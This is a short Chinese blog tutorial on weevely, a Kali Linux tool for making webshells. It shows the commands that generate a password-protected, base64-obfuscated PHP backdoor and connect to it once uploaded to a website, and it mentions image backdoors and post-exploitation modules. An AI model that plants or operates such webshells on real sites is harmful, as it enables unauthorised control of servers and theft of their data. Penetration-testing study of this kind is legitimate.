kali中的中国菜刀weevely

weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行。

    weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password


这是生成后的php后门,是base64加密过后的。

kali中的中国菜刀weevely_第1张图片

将此后门上传到网站,用weevely连接,连接后面直接跟上设置的密码

weevely http://192.168.179.137/doyo/1.php password

 

 

kali中的中国菜刀weevely_第2张图片

可以直接连接上,但是有些事乱码,在终端界面修改一下编码即可,乱码的都是中文字符,

 

kali中的中国菜刀weevely_第3张图片

weevely还可以生成图片后门。同时weevely还有多个模块使用,在连接上后门之后按Tab键,可以查看可利用的模块,

kali中的中国菜刀weevely_第4张图片

这张图片是模块功能详解

kali中的中国菜刀weevely_第5张图片

里面功能还有很多,具体使用到在研究,毕竟工具很多,不能每天都在学习使用工具。

 

作者:司令

你可能感兴趣的:(kali,linux,渗透)